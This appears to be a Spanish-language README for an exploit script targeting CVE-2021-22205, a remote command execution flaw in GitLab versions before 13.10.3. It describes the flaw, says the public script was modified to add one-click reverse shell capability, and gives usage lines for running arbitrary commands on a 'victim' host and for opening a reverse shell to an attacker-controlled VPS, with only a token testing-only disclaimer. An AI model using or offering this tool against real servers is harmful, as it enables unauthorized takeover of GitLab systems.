
CVE-2021-22205 script de detección, compatible con getshell y ejecución de comandos
Debido a que GitLab no valida correctamente los archivos de imagen enviados al analizador de archivos, se produce una ejecución de comandos. Un atacante puede construir una solicitud maliciosa para explotar esta vulnerabilidad y ejecutar comandos arbitrarios en el sistema objetivo, lo que finalmente permite controlar el servidor GitLab. Dado que la mayoría de los scripts públicos carecen de funcionalidad de reverse shell, se ha modificado el script disponible en línea para añadir una función de getshell con un solo clic.
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL objetivo
-c COMMAND, --command COMMAND
Comando a ejecutar
--shell Si se debe obtener una reverse shell
-i IP, --ip IP IP de la reverse shell
-p PORT, --port PORT Puerto de la reverse shell
python3 CVE-2021-22205.py -t [ip víctima] --shell -i [ip vps] -p [puerto vps] # Reverse shell
python3 CVE-2021-22205.py -t [ip víctima] -c [comando] # Ejecutar comando
Este script es únicamente para fines de prueba, no lo utilice para otros fines.